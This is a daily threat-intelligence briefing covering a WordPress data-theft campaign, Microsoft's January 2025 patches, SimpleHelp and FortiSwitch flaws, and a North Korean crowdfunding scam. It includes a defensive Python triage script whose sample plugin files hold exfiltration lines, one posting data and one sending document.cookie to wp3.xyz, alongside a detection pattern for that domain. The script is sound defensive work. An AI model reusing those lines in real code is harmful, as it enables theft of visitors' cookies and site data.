
Cyware Daily Threat Intelligence, January 15, 2025


Daily Threat Briefing Jan 15, 2025

A fresh wave of malware has compromised more than 5,000 WordPress sites, using rogue admin accounts and a malicious plugin to siphon sensitive data. With stolen data being funneled to the wp3[.]xyz domain, researchers urge website owners to bolster their defenses by blocking that domain.

Microsoft's January 2025 Patch Tuesday brings critical relief with fixes for 159 vulnerabilities, including eight zero-days, three of them actively exploited. Key patches close Hyper-V flaws that let attackers gain SYSTEM privileges and resolve dangerous RCE flaws in Microsoft Access, underscoring the need to apply the updates immediately.

North Korea's revenue-generating tactics continue to evolve: researchers have connected the regime's fake IT worker operations to a crowdfunding scam run by the group tracked as Nickel Tapestry. The scam lured victims via IndieGoGo, collecting $20,000 on false promises of an innovative wireless memory device.

Top Malware Reported in the Last 24 Hours

Malware campaign compromises WordPress sites

A new malware campaign targeting WordPress sites has compromised more than 5,000 websites. The attackers create rogue admin accounts, install a malicious plugin, and steal sensitive data, which is exfiltrated to the wp3[.]xyz domain; researchers have not yet determined the initial infection vector. Website owners are advised to block the wp3[.]xyz domain, review privileged accounts and installed plugins, strengthen CSRF protections, and implement MFA.
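The two reviews recommended above (installed plugins and privileged accounts) can be scripted for a quick triage pass. The following is an added example written for this briefing, not code from Cyware or from the researchers who reported the campaign. It assumes a plugin directory in the usual wp-content/plugins layout and a user export in the JSON shape produced by WP-CLI's `wp user list --format=json` (only the `user_login` and `roles` fields are used); the plugin files, user records and admin allowlist it ships with are constructed sample data so that it runs offline.

```python
"""
Defensive triage helper for the WordPress campaign described above:
scans plugin source files for the reported exfiltration domain and
flags administrator accounts that are not on an expected allowlist.
Sample plugin files and user records are constructed inline so the
script runs offline; point scan_plugins() at a real wp-content/plugins
directory and rogue_admins() at a real WP-CLI user export to use it.
"""
import os
import re
import tempfile

# Indicator of compromise reported for the campaign (the page gives it defanged).
IOC_DOMAIN = "wp3.xyz"
# Match the domain whether it appears plain, defanged ("wp3[.]xyz") or with an
# URL-encoded dot, so the same check works on source files and on logs.
IOC_PATTERN = re.compile(r"wp3(?:\.|\[\.\]|%2e)xyz", re.IGNORECASE)

def scan_plugins(plugins_dir):
    """Return a sorted list of files under plugins_dir that reference the IoC domain."""
    hits = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if not name.endswith((".php", ".js", ".html", ".txt")):
                continue
            path = os.path.join(root, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    if IOC_PATTERN.search(fh.read()):
                        hits.append(os.path.relpath(path, plugins_dir))
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
    return sorted(hits)

def rogue_admins(users, expected_admins):
    """Return administrator usernames that are not on the allowlist.

    users: iterable of dicts with 'user_login' and 'roles' keys (the shape of
           `wp user list --format=json`; assumption, constructed sample below).
    """
    expected = {u.lower() for u in expected_admins}
    return sorted(
        u["user_login"] for u in users
        if "administrator" in u.get("roles", "")
        and u["user_login"].lower() not in expected
    )

# --- constructed sample data, not taken from the page ---
SAMPLE_PLUGINS = {
    "akismet/akismet.php": "<?php // legitimate plugin, no indicator here\n",
    "wp-optimizer-pro/init.php": "<?php $u='https://wp3.xyz/collect'; wp_remote_post($u, $data);\n",
    "wp-optimizer-pro/loader.js": "fetch('https://wp3.xyz/log?' + document.cookie);\n",
}
SAMPLE_USERS = [
    {"user_login": "siteowner", "roles": "administrator"},
    {"user_login": "editor1", "roles": "editor"},
    {"user_login": "wpx_admin", "roles": "administrator"},
]
EXPECTED_ADMINS = ["siteowner"]  # the accounts the site owner actually created

def demo():
    """Write the constructed plugin tree to a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_PLUGINS.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        plugin_hits = scan_plugins(tmp)
    admin_hits = rogue_admins(SAMPLE_USERS, EXPECTED_ADMINS)
    return plugin_hits, admin_hits

if __name__ == "__main__":
    plugins, admins = demo()
    print("Plugin files referencing", IOC_DOMAIN, ":", plugins)
    print("Administrator accounts not on the allowlist:", admins)
```

A hit from either check is a reason to take the site offline for a closer look, not proof on its own: a plugin can legitimately mention a domain in a blocklist, and an unfamiliar admin may simply be undocumented. The string match is deliberately broad (plain, defanged and percent-encoded forms) so it can also be run over web-server or egress logs when checking whether the domain block recommended above is catching anything.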

Top Vulnerabilities Reported in the Last 24 Hours

Microsoft January 2025 Patch Tuesday

Microsoft's January 2025 Patch Tuesday addressed 159 security flaws, including eight zero-day vulnerabilities, three of which are being actively exploited in attacks. The breakdown of vulnerabilities is: 40 elevation of privilege vulnerabilities, 14 security feature bypass vulnerabilities, 58 remote code execution vulnerabilities, 24 information disclosure vulnerabilities, 20 denial of service vulnerabilities, and 5 spoofing vulnerabilities. The three actively exploited zero-days are in Windows Hyper-V and allowed attackers to gain SYSTEM privileges. Additionally, three remote code execution vulnerabilities in Microsoft Access have been resolved.

SimpleHelp bugs enable file theft and more

Multiple security flaws have been found in SimpleHelp remote access software that could lead to information disclosure, privilege escalation, and remote code execution. The flaws are tracked as CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726 and have been patched in SimpleHelp versions 5.3.9, 5.4.10, and 5.5.8. Users are advised to apply the patches promptly, change administrator passwords, rotate technician account passwords, and restrict the IP addresses from which logins are allowed.

Patch this critical FortiSwitch flaw

Fortinet has identified a critical security vulnerability (CVE-2023-37936, CVSS 9.6) in its FortiSwitch product line, which could allow remote, unauthenticated attackers to execute arbitrary code and compromise networks. The vulnerability is due to a hardcoded cryptographic key in affected versions. Fortinet has released patches for all supported versions and urges users to update their devices to specific versions or later. FortiSwitch 6.0 has reached its end-of-life, and users are advised to migrate to a fixed release.

Top Scams Reported in the Last 24 Hours

Fake IT workers scheme and fraudulent crowdfunding

Research by Secureworks found connections between North Korea's fake IT worker scheme and a crowdfunding scam. The group behind the scam is identified as Nickel Tapestry, which runs several activities in support of North Korean interests. The crowdfunding scam collected about $20,000 and represents an earlier instance of North Korean actors trying out different money-making schemes before turning to fake IT workers. Nickel Tapestry was linked to an IndieGoGo crowdfunding page promoting a Kratos portable wireless memory device; buyers reported that the campaign was a scam, with no products delivered and no refunds issued.
